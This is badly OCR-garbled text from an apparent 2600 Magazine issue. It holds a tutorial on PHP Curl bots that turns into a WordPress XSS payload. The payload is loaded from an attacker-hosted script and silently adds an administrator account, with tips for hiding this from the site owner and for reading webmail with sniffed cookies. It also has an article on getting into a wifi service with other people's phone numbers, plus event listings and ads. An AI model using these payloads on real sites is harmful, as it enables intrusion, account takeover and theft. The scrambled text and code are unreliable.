X 10. That's called HlTP. Assuming Twitter hasn't changed their layout sino: I wrote this.2600. Stweet = substr($output. max ~ 50 Connection : Keep -Alive Trans fer-Encoding: c hunked Conten t-Type: t e x t /h un1 . SQ. Atler sending that GET request for / Lo:2 600.5 Ac cept -Encoding: gzip.I Page 54 2600 Magazine Spring 20ll Page 55 .com/2600 .3 and I'm using Mac OS X 10. I just opened up my web browser. 1 ) 'J . rvd.0. but you can feel free to look them up.com/rss.com User-Agent : Mozilla/5 . and quite a bit more. Here's the GET request I sent 10 the server. and curl_ clOS<:(). The rest of the lines are HITP headers. '1*. Once il returned a 200 OK. closes the Curl object.2600. and each lime the web server responds.xm1. The next three lines of code add options lO this Curl object: the URL of the website it will be loading. For writing this ankle. so it uses the exact same protocol. true). A Quick Note About Cookies Cookies are name-value pairs that websites use 10 save information in your web browser. i -utf-8. st r l e n (Sstart_ string).6.'. Tbe HTTP Protocol Before J dive 100 deeply into code. ?> Go ahead and make a new PHP file and pul this code in it. Now we have all the HTML from that request stored in the variable Soutput.2600. W"1Ieshart..applicationl . J I"m seoding another GET request lO the server.(Macintosh.2600. just for laughs . curl _setopt(Sch. CURLOPT_~~L.is instead: Googlehotl2 . com RSS Feed' href: .9. My browser faithfully complies: GET I HTTPIl. Send .0 .7 Keep-A live: 115 Connection: keep-alive My web browser was smart enough 10 figure out the [P address of 2600 . $start.. it should print out 2600 latest tweet.3 Accept: text/hcml.com..and1e 10 the Curl object in the variable Sch. and what headers an: included in the responses. this . The nat line of code runs eurl_ exect).deflate A~cept-Ch arset: rSO-8 8 59-1. (Macintosh. s t rpos t soucput • '</span>' .cript type . which means Internal Server Error. which is just HTTP wrapped in a layer of SSL encryption.com (technically.s Twiner feed and prints out the latest tweet. we'll pretend 10 be using rE6 00 Windows. as long as you can find an XSS bole. Some Tools to See WTF Is Going On You rarely actually sec what H1TP headers you're sending 10 web servers. The browser makes requests. 'Mozi lla/4. In the first block of code. -Windows NT 5 . II s e arch th r ough Soutput .6. charset= -i60-88 59-1 It returned with a 30I error code.0 .. js'></script> <link rel=' stylesheet' type: .q=0. The languages ('m going to be using are PHPaod JavaScripc.

ne w .0 ozi ... CURLOPT_USERAGENT . II set ehe use rname. r v :1. 0.... Don't worry about this.submit ~ L og+ln&r edir e ct_to = -'8226 83fe7f6. $s t a rt string. we'll just needto senda GET The first field. wordpress_logged_in -_bbfa 5b726c6b7a9cf3cda9370be 3ee -'9 1=admin%7C1274758230%7C03 7c4338 -'11bdOS0823aeS70f3b3d38dS Content-Type: a pp l i c a t i on/ x. $c ookieStrings.php Cooki e : wordpres s_test_ -cooki e=WP+Cookie+ chec k Con t en t-Type: app l ication l -x -www-Eorm-urlencoded Content-Leng th : 116 log =admin&pwd=supersecret&wp. s t rlenl$sta r t_s tr i ng ) ..'. $wp_url.' . the websitesets fourcookies. As you can see. Scooki eS t ri ngs = ar ra y() . path=/wordpres s /wp -'-adrnin.Cookie+check. add t he m to an a rray Si ndex = 0..11.' . and stores what's between those in the variable Srweet... ur_encode(Spasswordl .. CURLOPT_REfERER.'/wp-admin/user-new .. "nonce" name="_wpnonc e " va l ue = "pass2". -'&pwd=' . CURLOPT_RETURNTRANSFER . com and the password "letmein". send_s tr ing. c url _close ($c h ) . f or($i =O.9 . and each cookie has a path. url encode ($us e rnam e) . M E 6. 3 [mor e headers . . l e t s s ay iE 6 again Suse r _a gen t ~ ' Mo z i l ~ a / 4. send = str pos( Sou t pu t. c url _ s e t opt (Sc h . CURLOPT_RETURNTRANSFER. fakeema iladdress . "passl". cur l_s etopt( Sch. (Macin t osh ..6.l Host: localhost User-Agent : M l1a /5. 6 . wordpress_test_c oo -'kie=WP. "user_login".1 ) '.com were GET requests). Let's login to a WordPress website (for this example. are similar. while POST requests send the data beneath the headers in the POST request.l 302 Found Set-Cookie: wordpre s s _test_cookie -=WP+Cookie+check. e sn ew-pas swor d = ' l e t m i n ' .. 10. W ndows N~ 5. Intel Mac OS X a . is going to cause a request to Iwordpress/wp·admin/user-new... Toget that value. $wp_url . . 2.1 sc a re by logging into wordpress (using POST..setting -'s-1 =m6%3Do. In tel Mac OS X . ' / wp.6. '..$s t a rt).' h t t p :// loca l ho s t/ wor dpress' .. since . And here was the response : HTTP/I. Cur l _s e t op t ($c h . POST I wor dp r e s s/ wp. Send _ s t r i ng = ' .a drnin/ user .i t ' s t he s ame as 2nd ) Scook i e = Sc oo kie St r i ng s [Oj . $wp_u rl . wp. beneath the POST request headers is a lJRL-encoded string of name-value pairs.com/2600 myself and viewingthe sourceof the page. I I make up a user agent to us e. CURLOPT_HEADER.php ' ) . . curl_set opt( $ch . Sus er_agen t). And then the final echo() function just prints out Stweet.6 . en. II sea rc h Sou t put for the four cookies . and emai ' of the new user we wi ll crea t e Snew_username . $s ta rt = strpos($ ou tput . and this time I also sent a Referer header.l og i n .. CURLOPT_URL. two of the cookies have the same name and value.'Set-Cookie : '.. II search f or _wpnon ce hidden field va lue Page 5 6 ..'. As you can see...searches Somput for the first occurrence of the string <span dass="entry-conlent">.9 . huh? Automatically Creating WordPress Users Now let's do something a little more difficult. no t GI:. Scookie) .php problem. curl_setopt(sch .. I need to send a POST request to Iwordpress/wp-admin/user-oew.path~/wo rdpress l Set-Cookie: wor dpres s_bbfa5b7 26 c6 -b7a9cf 3cda9 370b e 3ee91 ~ admin%7 C12 -74755424%7 C70045a57 2d5f43ad9d Ofe -'74755424%7C70045a572d5f43ad9dOf e -'8 22683fe7E6. curl_closel $ch) . and " then there are other hidden fields that get sent to: "wp-submit" is "Log In". } I I turn cookies into a single coo ki e s t r i ng (skipping 4th cook i e.Scook ieStrings(3) : II load t he add us e r page Sch = cur l _i n i t ( ). Now I'm going ahead and adding a new user called "hacker" with the email address ha ck e r@ .www-'form-urlencoded Content-Length: 236 _wpnonc e=0 7cd245b42&_wp_http_refe -'rer=%2Fwordpress% 2Fwp-admin%2F -'user-new. search through its HTML for the hiddenfield "07cd245b42". .. s us e r _age n t ) . CURLOPT_POST.. U.2.. "action". cUrl _s e t op t (scn . ·07 cd24 5b 42 · I > the valuesare blank).com&url=&pass1=let -'mein&pass2= le tmein&role=admin .US. I 'll do this manually first and record the HTTP conversation with the Live HITP Headers extension. CURLOPT_POSTFIELDS. That's therespecifically to prevent people like me from doing things like this.. cu rl_s ecopt($ch.php'). swp_url. page. Sindex ) • . II th is will only wo rk if we already ha ve a us e rnam e a nd pa s sword Sus e r name = ' admin ' .. U... I need to pass along a cookie string with the cookiesthat wereset earlier.'hacker' . and a Cookie header POST and GET . 2F& cur l _ se to p t l $c h .admin l [some more headers here t oo . ai f a $new_em l = ' ha c ke r @ a kc<?m i la ddr ess .'r l Sch = c~~ ~_inie(l.. ScookieSt ri ng s [] = substr($ output.. The trimO functions strips the white space. and then submit the form with that? I f I look at the source code of the add user that value. Here's the post request: POST Iwo r dp res s/wp. $s t a rt .php&action=adduser& -u ser_log i n =hacker&first_name=& -'last_name=&email=hacker%40fake -emailaddress . "redirect jo" is ''http:// localhost/wordpress/wp-admin/".l Host: localhost User-Agent : Mo zilla /5. CURLOPT_COOKI E. CURLOPT_USERAGENT.. path= /wordpress/wp -. CURLOPT_REFER ER. php HTTP Il. "email". '&wp-submit~Log+ln& redirect_t o=ht tp _%3 A % 2F%2Flocalhost%2Fwordpress%2fwp-admin% t e stco ok i e~l 'l..' /wp-log in. $i< 4 . .31 -Gecko/20100401 Firefox /3. password ."role". "uri". I figured this OUI by going 10 lWiner.. and then the next <zspan> after that. 'log='. en-US. and "testcookie" is '""1".3) Ge c k o/2 0 1 00 4 0 1 Firef ox/3.com and twitter . Spas sword = 'supersecret '. Here's a PHP script thatdoes all of that: <?p hp II set t he urI o f the wordpre ss s it e t o do t his on $wp_u rl .P a g e 57 . $i+ +l ( $s tar t _stri ng . ) AIter loggingin. wp-sett ing -s-time -1=1274585390 .. 0 .. Send. Soutput = curl_exec($ch ) . istrator&adduser=Add+User In order to add a oew user.. and "adduser" (althoughseveralof . SI i . php. but GET requests send all the data through the URL.(M c i n t o s h .content / plugins. $s tart) . ph p . true).3 ~ s om e ext ra headers . httponl y Set-Cookie: wordpress_logged_in_ -'bbEa 5b726c6b7a9cf 3cda93 70be3ee91 -' =admin%7C12747554 24%7C3 2f 9298d 93 -71bbc7f 684dafb2ce161bb . cu rl _setop t ($ch .''first_ <i np u t t ype=" hi dde n ' i d =' _wp n~e".. The data for the POST requestneeds to includethese fields: "_wpnonce". hosted at http://localhost/ "'wordpres s I ) and add a new administrator user. php ' ) . $outp ut = curl_exec ($chl ..but how are we supposed to know called "_wpnonce". c url_ s etop t ($c h . J Referer: http :// localhost/word -'press /wp-admin /user-new. HTTP Il. Sindex = send + s trl e n (Se nd l . true).php Cookie: wordpress_bbfaSb726c6b7a9 -'cf3cda9370be3ee91=admin%7Cl 274758 230%7C2fd245efd985716182bf 7 -6c2a 5d44 693.. rv :I . true ).. it containsthis: " wp_hllpJeferer". . "pwd" is set to "supersecret (which is the password). "log" is set to "adrnin" (which is the username). but different paths. _wpnonce. and then I add a new line at the end to make the displaya littleprettier. Pretty cool. 10 . httponly Set-Cooki e: wordpress_bbfa5b726c6 -'b7a9c f3 cda9370be 3ee91 ~admin%7C12 -http%3A% 2F%2fl ocalhost % 2Fwordp -ress%2Fwp-admin%2F&testcookie=1 This time I sent a POST request (the ones above for 2600 . httponl y Location: http : / /l ocalhos t /word -'press /wp. J Referer : h t t p: // l oc a l hos t/ -wordpres s/wp-l og in . "Iastjiame". The value is first..- 2600 Magazine Spring 2011 . tr ue). the web browser will only send one copy of this cookie. com'. cur l_se t opt($ch . path~1 -wordpr ess / .a dmi n / ' ) .' Iwp ' ~ og in .. CURLOP':_URL. 0 Icompat ible . curl _se t op t ISc h .

url encoded" ) . var new_usernarne = ' h a c ke r ' . curl_close ($ch ) . it will pop up an alert box.. I mentioned writing bots that can download and store all the email in a webmail account..... a new administrator user called "hacker" will silently get created.. This little piece of code totally works (with WordPress 2. but it's not very useful for backing websites... If you want to be alerted when it happens. Th is particular script could be improved in a COuple of ways. CURLOPT_COOKIE.readyState != 4) return..-... var start = h ttpl . You'll have a new admin istrator user called "hacker".. . but with the power of Ajax... load the post page. "'&_wp_ht·tp_referer=% 2Fwordpress%2Fwp-admin% 2Fuser -new.. maybe your First Name is "Bob ". Python. and even alert you that this has happened so you can login. Thoughts 00 PHP Dots Using PHP and Curl. cro ll s ~ <s c r i p t s rc vh t cp . curl_setopt ( $ch ..onreadys t a te change = function() ( if(httpl.. httpl.. can download and store all of their email as long they don't log out before your script is done running. Also. Make a page 00 a website you control (say.js somewhere.. it executes http://myevilsite!back. Pretend with me that there 's an XSS bug in the comment form in WordPress. for example. $cookie) . then post lhe form to change the email address to your own email address . var new_email = .. http2.. ' &fir st_name=&last_name= "&email=' . . . u r l e n c od e l$ ne w-pa s s wo r d ) . $start = strpoS( $output. If.. and you would instead. you can write a bot that can do (almost) anything a human can do.$s tart_string = ' <input type="hidden" id~· _wpnonce· name="_wpnonce· .... Then. curl_setopt($ ch.. ' / wp. You can post a comment and include JavaScript code that will then get executed wbenever anyone loads the page. http:// myevilsitelalert. 0) + s trlen($start_string). "_ wpnon c e " • name = "_wpnonc e" v a l u e="' .. And since it's a bot. and include it in a post (by editing the post in HTML mode)... i f (window . $e nd -$ s tar t l .. so really this won't be silent at all...php ') .js on your site. Wbatis XSS? An XSS bug is where you can subm it information that includes JavaScript code to a website that gets displayed back to users of that website. s end () . the real admin would never get an email about it. Ss t a r t ).. and go check to see what WordPress users your site has..2 anyway)... which means it uses cookies to keep track of active sessions. 10 this way. var _wpnonce = httpl. II search f o r _wpno nce h idden field val u e var start_str ing = ' < i n p u t type= "hidden" i d ..com.... I I add our new user $ch = c u r l _ i ni t ( ) . Sstart_string . c u r l _ s e top t ($c h ..end). that code could silently add yourself as an admin user on the site.. or they might never run it. '&url =&passl=' . There will be a new one. while you're logged in. Perl. CURLOPT_REFERER. php&ac ti on=addus er&user_ " login= ' Tescapel new_u se rname ) +'& fir st_ n arne =& last_name =& e ma il='+ " e s cape (n ew_ema il)T ' & u r l ~&passl= '+escape (new-passwo rd)T'&pass2=' "T escape (new-p as swo r d ) T' &r ol e= administrat o r&addus e r=AddTUser ') . Send-string = . s t a r t ) . you can check to see if the user is logged into WordPress first before trying to add a new user (there wiII be a lot more traffic in the logs if each and every visitor sends extra requests to wp-admin/user-add. then add a new user. '_wpnonce = ' .. var end_string = .. But JavaScript on the other hand runs in web browsers . I>' . and you can get other people (like adrnins or other users of websites you 're trying to back) to run your code in their browsers if you exploit an XSS bug. .. then submit the settings form again to change the email address back. Then make the Ajax GET that script Page 58 2600 Magazine _ . ..hacker@fakeemailaddre ss . CURLOPT_RETURNTRANSFER.. ... Change the $wp_url. CURLOPT_USERAGENT .open(" POST" . Well.js: II s e t u p va r wp_ur l = 'http : //localhost /wordpr e ss'. and your Last Name "<script>alert(O)<lscript>" .urlencode($new_email) ... These are all things you can do with PHP. Go look at your WordPress users.wp_urlT"/wp-admin/user -new. you can use Ajax to do that too. If you want to test this out on a WordPress site you control . } return h t tp. you trick someone else who does have access to run it for you." appli c a tion/ " x-www-form..responseText. it might just take a day. If an admin stumbles upon your profile where the Last Name field actually contains JavaScript.. or with any other server-side language like Ruby. II c reac e an a j ax o b j e c t a nd return it f u nc t i o n aj a xOb j e c t () ( v ar ht tp . http2. ph p ' ) . Admins often have the ability to add new users to websites . XMLHTTP") . curl_setopt($ ch... go ahead and upload this script as hack. and $password to a WordPress site you control.000 times in a row. similar to the Curl library in PHP.php".urlencode($_wpnonc e).. c u r l _se t o p t ($ch . e lse( h t tp=n ew ActiveXOb j e ct ( "Mi crosoft . $o u t p u t = curl_exec( $ch) . Sus e r _ a g e n t) . You need to already have access! With XSS. for them that says 0 too. Whenever anyone loads this page. II add out new user var http2 = ajaxObject( ). value="' . .. Here's what' s in hack.send ('_wpn on c e ='+ e scape( _w~nonc el+' &_wp_ht t p_r e ferer= "%2Fwordpres s%2Fwp-admi n%2F u ser.:Spring 2011 Pae« 59 . curl_setopt ($ch.. For example. What if you want to be anonymous? It's easy to use Curl through a proxy server.. .indexOf(end_string. s e nd = strpos($output . So. CURLOPT_POSTFIELDS.responseText.php&act ion= "adduser&user_log in =' ...subs tring( star t . If an admin loads this page. all Ajax is is the ability for JavaScript to make its own HTIP requests and retrieve the responses. Just look up the docs for cur1_setopt() to find out how. . or C.php) that sends you an email when it gets loaded. send_string.setReque s tH ead er(" Con tent-type". If someone else goes to your profile page.... It might take a week for the adm in to get around to running your code.. $usemame.. and cover your tracks.. true).. Really..wp_url+"/wp-admin /user-n ew . 7> • commen t e rs are a bunch of . .ne w. S_wpnonce = substr( $output.' /wp-admin /user -new . http 2.open (" GET" ... say.. you can do a lot more sinister stuff. ) II l o a ~ the u s er page var httpl = aja xObject(). You post a cornmeot that says : Good p oint! And all the other I ht tpl.9.. '&r o l e =a dmi n i s t r a t o r &a d du s e r= "AddTUser ') . hctpl. that means you've found an XSS bug.urlencode($new_u sername) . To get around this.. $wp_url. The WordPress XSS Payload The PHP script that added a new user is a good start..myevils ite /hack. CURLOPT_URL. or to run it once every five minutes until you want to stop it. It's totally feasible to write a PHP script that. » . . true ).true).. $wp_ u r l . var new-password = 'le tmein'.. after you submit this form.a dmi n/ u s e r . j s s -e zac r i pt.urlencode($new-pas swordl . l ength .indexOf(start_s tr ing. webrnail uses HlTP. true). it's simple to run it. I I .. re sponseTexc. People use Ajax as a buzzword to mean any sort of fancy JavaScript... escalate privileges to command execution on their server.. given a cookie string for sorneone's Yahoo! mail account (which you can get by sniffing traffic on a public Wi-Fi network).. it says your first name is "Bob" and it pops up an alert box that says 0. XMLHtt p Re ques t ) ( http=new XMLH t tpReques t(). 0) T • s t ar t _ s tr i ng . ... and run it. curl_setopt($ch ... 150. by default WordPress sends an email to the admin- istrator of the site when a new user account gets created. CURLOPT_POST.. $start..php" . '&pass2=' . Make sure you delete the "backer" user first if it's already there. and in fact you can even use Curl through the Tor network (though it will be much slower) .new . I>' . va r end = httpl.. you can have the script first load the WordPress settings page to see what the admin email address is set to. Popping up an alert box is harmless enough....php). as long as you're able to do it by band first and see what the H1TP headers look like..

and welcome Ihe hacker community. are open to everyone.. .. There are two ways to protect your websites against automated web bots and crazy XSS attacks. Germany vulnerability in their network which could allow unauthorized access to their services by jumping onto someone else's account. We only list events that have a finn date and location. .~"'. It was now simply a matter of copying and pasting each mobile "umber (thanks iOS 3) into The Cloud's login screen to see if they were accepted. Greece www. Hacker 00nferen.. to .v~eDts of generally ·cost under $100 and ' are open co everyone.. The "login" had automatically pUI my phone down as being on the Vodafone network (correct). on the third such entry. which means you'll have to test your users before they can continue if it's important to you to thwart 0015. Spring 2011 ... this did gel mc lhinking.~"l" ~... email usatbappenings@2600. I inserted my own mobile number and this was quickly rejected as I am nOI a member of The Cloud. Make sure it actually works . this automatically navigated me to the sign-in window for accessing The Cloud services. Austria 20 II. please don't do anything that would get you into trouble such as accessing their wifi routers without permission.freifunk.ch September 8-9 SEC-T Stockholm. the possibilities are endless. Sweden www.. [f you know of a conference or event that s hould be known to the hacker community. J believe they would not necessarily be charged any extra as The Cloud offers unlimited downloads on its monthly subscription. this article will show you that it's a bit more dangerous than that.delindex.hamburg. WA www. Germany events. In conclusion.. and the only wifi access in the area was given as "The Cloud.. ne c A(cDonal£u:www..' .nellWireless.de/category J28c 3 Maker Faire NC 2011 North Carolina State Fairflrounds Raleigh.org December 27-30 Chaos Communication Congress Berliner Congress Center Berlin.. Some background first: The Cloud sells itself as one of Europe's biggest public wifi providers. and you'll get an email when your new account is created.org June 3-5 Freifunk Wireless Community Weekend 2011 c-base space station Berlin. However.notaoon. .com or by snail mail at Hacker Happenings . ~:. though to my surprise the only security/password required was my mobile phone number! JUSI 10 check all was well.-...I1!' 1.mCdonalds. I quickly opened my was easy to fitter the list of numbeis mto friends who had business pbones or did a lot of business traveling.. And finally.. it is clear that The Cloud has a "' .sec-r.ccc. something that's easy for bumans to answer but hard/impossible for computers.. Once accessed.ccc..nel August 10-14 Chaos Communlcatioo Camp Finowfurt. ~ . [fyou're creative.. When coonecied.athcon.. -.org August 4·7 DefCOD The Rio Hotel and Casino Las Vegas. IU all your XSS holes! XSS gets dismissed as a lowly not-veryharmful vulnerability because "so what if someone pops up an alert box?" Hopefully. the local McDonald's was where [ found myaelfbored and chomping 00 a Big Mac. wbich you can sign up for on a monthly contract. If '· :l'(~:'·· 1tI" ".ees Listed here are some upcoming e.~ .when it gets executed. With much amazement. . Switzerland blogjurackerfest .. it could allow a malicious user to tether up their mobile pbone to a laptop and abuse this access (multiple PiraleBay torrents'i).'. the only way to defeat bets is to include some sort of CAPTCHA (those annoying images with skewed letters you need to retype) . France hackitoergosum. However.org April 22·25 Easterbegg2011 Eidelstedter Mansion Association Hamburg... mtereSt April 7-9 Hackito Ergo Sum 2010 Paris. . Middle Island. NC makerfairenc.org April )4 ·/7 June 18-/9 The following article relates 10 a very s~ple hack of Internet service provider The Cloud's public will network. YourCAPTCHA doesn't have to be skewed leners.. " ~ '. .=.phplEasterliegg20 II TooeCoe Seattle Last Supper Club Seattle. it allows a subscriber unlimited Internet access when their smart phone is used within the range of an establishmentsuch as a restaurant or cafe.. All il is is a simple Turing test..toorcon.org August 5-7 June 2-3 NlnjaCoo The Hub Vienna Vienna.~+~ ~":r . NY 11953 USA . aren't ridiculously expensive . Communif)'_ Weekeod_20I I June 18 Jurackerf'es! 2011 Delemont. Notacoo Hilton Garden Inn C1eveland..ninjacon. . or on a pay-as-you-go policy. I fired up my iPhone's Safari browser.. PO Box 99.OH www. co.P a g e 61 -::.. Germany wiki. Please send us your f eedback on any events you attend and let us know if they should/should not be listed here..." As expected. Germany events.I've seen forms with CAPTCHAs \hat still work fine if you ignore the CAPTCHA field.de/category/camp-20 II August 26·27 AlbCoo Jockey's Country Club in Kifisia Athens... but it does have to be annoying. Please.. As for your friends' phones.defcon.. In my case. this article is written only to Rag up the potentially weak vulnerabilityof their login process.. First. I succeeded in being accepted by the router! II was then a matter of navigating to a web page (Google in this case ..sorry!) to show I was really connected.com References • The Cloud: www. thecl ova .. Higher prices may apply 10 the more e laborate events such as outdoor camps. NY www. they might be cut off due to your dubious online activities under their name! woo.ccc .uk Page 60 2600 Magazine _ .

Price includes mailing. Let us be the rope to help you get back on the top with packages starting as low as $4 . re-configure. CA 95472. and the numbers and area they serve .95. The Bus Pirate ($30) is a universal bus interface thai talks 10 electronics from a PC serial terminal.. In todoy's hostile anti-hacker atmosphere. For technical assistance.org.00 setup fee . NY 11953 USA or order through our online store at http://store.. quantum causality. Various FYI : public intelligence blog at phibetaiota. please note I also specialize in defending medical marijuana and cannabis cultivation cases .us or order directly from store .net.NEf is #1 for fast.or a[ Law Offices of Omar Figueroa.5 FM in New YorlcCity. youtube.. Send your ad to 26()() Marketplace. AT OWLDOMAIN. be another one offered again . Include a very unique user name.COM we take pride in helping our users develop and deploy their newest ideas . $59 .com .2600 . vending machine jackpotters. org. and others who will remain anonymous. visit www ... Lifetime 26% discount for 26()() readers .. network traffic analysis.com or call 614-285-4574. I am a semantic warrior committed 10 the liberation of information (after all . L. Use hundreds of IRC vhost domains and access all shell programs and compilers. algorithmic structures. IPSec account also availahle for an additional $5 . require the need for a secure place to work.2600 . and much more.org..COM . or hamster. as well as the super-popular original keycbain. at (415)489~20 or (707) 829-m 15. social engineering. genuine cultural diversity. dolphin. This is pan of my txtnyc mobile info service experiment. Of course. TOS : The exploitation of minors will not be tolerated...net! Announcements EXPLORE. We hope that's clear. with as much information as possible . Middle Island. Your feedback on the program is always welcome at oth@2600. I don 't have certs. and 1 am willing to contribute pro bono representation for whistleblowers and accused backers acting in the public interest.. and other cybercrimes. anywhere there 's a TV. officer. We need more people exploring. To purchase. information wants to be free and so do we).com . restaurants. and hats for those rare times that you need to leave your bouse .. www. I do not consent to any search or seizure. For more. GAMBLING MACHINE JACKPOTTERS.NET UNIX SHELLS & HOSTING. Also. OFF THE HOOK is the weekly one hour hacker radio sbow presented Wednesday nights at 7:00 pm ET on WBAJ 99. For details write: Joseph Hayden #7410 I . it is not the real deal.. Include an email address so we can send your configuration . how it is used for remote control! Casblmoney order only . Key chain hole for easy insertion on your key ring. an. Our Online Public Intelligence Journal (loaded with resources) can be found at bnp :/lphibetaiota. Extra points for third-world countries . COLLEcr. ANONYMOUS VPN. The Open Worlcbench Logic Sniffer ($50) is a 100MHz logic analyzer with USB interface . compile.gdldOFOj Related links : twiner.strong financial performance. Also. and more .. the TV-B-Gone Pro turns off TVs up to 100 yards away! 26()() readers get the keychains for 10% discount by using coupon code: 2600REAL. We seek to identify dysfunction and energize creative solutions by interconnecting and harmonizing the 12 policy domains with the top 10 global threats and 8 cballengers . with domain purchase. Bulk discounts for hacker spaces are quite significant.. bars. fraud. business and tax law manipulations. Reverse Net is owned and operated by Intelligent Hackers . Hack your world with the Bus Pirate. You can also tune in over the net at www2600 . Ste ..00 per month to IP Anonymous. Don't be fooled by inferior fakes. Simply point your PPTP client at ipanonymous . PO Box 2. Miscellaneous payphone information is also welcome. org. computer devices. WA 98339. JEAH also features rock -solid UNIX web hosting. PO Box 752. Multiple Dual Core FreeBSD servers. and 25x the storage? JEAH. with a money back guarantee. Need a VPS? How about a dedicated server? Maybe shared hosting? We have all of those and more! We realize the economy is in the gutter right now . at FYNE. Logic Sniffer.org. to beep-off a long distance call so you can then Multi Freq. and connecting public Intelligence in the public Interest (Cryptome.com or 866-50 I-CHEN x007 .. except you... and dysfunction.gdlb4519 & Collective Intelligence bttp :/ltrlmlj09S Contact earthintelnet@gmail. Pleaseconlact me. Stand up for your rights: "I respectfully invoke all of my Constitutional rights. righteousness. Deadline for Summer issue: 5125/11. TV-B-GONE. Archives of all shows dating back to 1988 can be found at the 26()() site in mp3 format! Sbows from 1988-20 I0 are now available in DVD-R high fidelity audio for only $ lOa year or $150 for a lifetime subscription. and play TV POWER codes. famous. and I want to speak to a lawyer. For those in NYC. strong community involvement. We support 26()(). So take a five minute break from surfing prOn and check out hnp :/lwwwJ1N)( . Past clients include Kevin Mitnick (miJlion-dollar-bail case in California Superior Court dismissed). NO COMPROMISE PROVIDER of open architecturebased network privacy & security services is actively searching for exceptional technologists (of all hat colors) with extensive experience in network topology/design. and much more. Available at $45 per 12 pack of half liter bollles. Only a few left. lockpicks.. Send check or money order to 26()(). etc . Write 10 conlact@c1ub-mate.com Wanted SEEKING TELEPHONE EXCHANGE LOCATIONS. sanity..pay~honebox. Resume and references available upon request. Omar Figueroa. ANYTHING please . intelligent hackers Help Wanted ATTN 2600 ELITE! In early stages of project to develop an international social network for information exchange. A. unused. Missouri 63141. that's it • there will never.. mint condition! Join the elite few who own this treasure! Once the remaining few are sold. anti-censorship. Sysadmin..." Remember your game theory and the Prisoner's Dilemma: nobody talks. Free books: Intelligence for Eanh . Only the genuine TV-B-Gone remote controls can rum off almost any TV in the world! Only the genuine TV-B-Gone remote control has Stealth Mode and Instant Reactivation Feature! Only the genuine TV-B-Gone remote control has the power to get TVs at long range! Only the genuine TV-B-Gone remote control is made by people who are treated well and paid well. email ipanonymous@yahoo. Complimentary case consultation . We've got swag for everyone.- Spring 2011 .O.dontexist. Not only a rare collector's item but a VERY USEFUL and unique device which is easy to carry with you at all times. Did we mention unlimited bandwidth and data space with our shared hosting? OwlDomain completely suppons 26()()! So much in fact that we have already cut our prices by over 26%! J!NX-HACKER CLOTHING/GEAR..just send "txmyc" to 368-638. Don't expect us to run more than one ad for you in a single issue either. webtxtmsg . You can also email your ads to subs@2600. nobody wiU ever know. JEAH.com . but loads and loads of experience. How about Quad 2. as a 26()() member by dangling your key chain and saying nothing.com . PAYPHONE PICTURES & NUMBERS WANTED from around the world . Uber-SecretSpecial-Mega Promo: Use ''26()()v28no l '' and get 10% off of your order. ideal for telephone remote control of your own electronic remote devices.. We believe every user has the right 10 online security and privacy . Cover one hole and produce exactly 2600 hz..com.com. All prices include worldwide shipping! Check out all our open source projects ar www .corn (make your web content accessible through text-messaging). Tribal-based management philosophy . Just a few topics include : cryptography/secure communications. Page 62 .org) .we make open source hardware. RFJD reader writers. Include your address labeVenvelope or a photocopy SO we know you're a subscriber. we reserve the right to pass judgment on your ad and not print it if it's amazingly stupid or has nothing at all to do with the hacker world . concubine. etc .true-<:ost. Please send all to sfoswald+payphone@gmail. The caffeinated German beverage is a huge hit at any hacker gathering. Hosted in Chicago with Filtered DoS Protection. Turning offTVs is fun! See why backers and jammers allover the planet love TV-B-Gone...com has 300+ T's. their locations.com. Details . from the budding nOObletto the vintage geek. Identify yourself at meetings.net. capture and replay infrared signals. or interesting places.we recently survived a massive federal effort to shut us down via extralegal harassment & imprisonment of our founding em on political grounds. Mail [0: WHISTLE.95 USD a month . ever.reverse. All submissions are for ONE ISSUE ONLY! If you want to run your ad more than once you must resubmit it each time. Must have strong loyalty to principles of free expression.lel (pgp key fingerprint: 8BA9 5A91 2407 IDA6 6AC2 P9C2 04A8 C3Dl 073D 9665). Send $5 .Marketplace For Sale DANGEROUSPROTOTYPFS. ONLY SUBSCRIBERS CAN ADVERTISE IN 2600! Don't even think about trying 10 take out an ad unless you subscribe! All ads are free and there is no amount of money we will accept for a non-subscriber ad .. Please send in pictures of paypbones in unusual . compensation info. odometer programmers. true-cost. I work as the NYC Director for the nonprofit Earth Intelligence Network . misappropriation of trade secrets.net. KS 66043. stable. The site is called Pay Phone Box and can be found via www. eliminating a ton of early prototyping effon wben working with new or unknown chips.. THIS IS THE ORlG1NAL WHISTLE from Capt'n Crunch cereal box . smart-cityre-configure.re-<:onfigure. hnp:/lwww. 9GB of RAM. INTELLIGENT HACKERS UNIX SHELL. & longtime community credentials available via: wrinko@hushmail. 26()() readers' setup fees are always waived. Cover the other hole and you get another frequency. Tired of being naked? JINX.. SUSPECTED OR ACCUSED OF INTERNETRELATED CRIMINAL OFFENSFS? Consult with a lawyer experienced in defending human beings facing computer-related accusations in California and federal courts. password and the date you would like service to Sian .CF. USB Infrared Toy ($20) is a PC remote control receiver/transmiuer: view infrared signals on a logic analyzer. Namaste. Be sure 10 include your subscriber coding (those numbers on the top of your mailing label) for verification . I want your lists of telephone exchanges. Port Hadlock . Box 410802 (ST).. because we read too! Don't forget our free private WHOIS registration service. 7770 Healdsburg Ave. Brand new.comlearthintelnet . Contact them at your peril . I choose to remain silent. collecting..CC.. Roben LyIl1e of The Deceptive Duo (patriotic hacktivist who exposed elementary vulnerabilities in the United Slates information infrastructure) .net.com .P a g e 63 . given thaI the worlds of the hacker and the cannabis aficionado have often intersected historically. Wikileaks. Coupon Code: Save2600 . VPN architectures.hllp :/Iis. Tum off TVs in public places! Airports. We make no guarantee as to the honesty. Affordable pricing from $5/month. Lansing. All contributions will be added to the increasing collection of callable international payphones. explore without Big Brother looking over their shoulder. PO Box 99. www. PO Box 83. or need 10 barter infonnation with professionals [0 expand your reference base? We need your belp to see this project succeed . and secure UNIX shell accounts. CLUB MATE now available in the United Slates . I am willing to pay with dollars or trade for similar data. Contact: BitRobher@sbady. DBA .66GHZ processors. VoIP admin .comlofftbebook or on shortwave in NOM and Central America at 5110khz. Are you looking to apply your technical skill set to a multitude of world changing projects.DangerousPrototypes. CONNEcr.2600 Magazine _-. Middle Island.org. concealable blackjack card counting computers. another if your telephone office uses in-channel long distance equipment. Use both holes to call your dog. Contact: mobiledemocracy@hushmail. Thank you in advance. ..re-configure . stickers. USB Infrared Toy.com/earthintelnet. portable magnetic stripe readers & writers. everybody walks. If it doesn't say Cornfield Electronics on it. Also available as an open source kit. CAYT'N CRUNCH WlDSTLFS.TVBGone.COM .. sovereignty.. I am an aggressive Constitutional and criminal defense lawyer with experience representing persons accused of unauthorized access (so-called 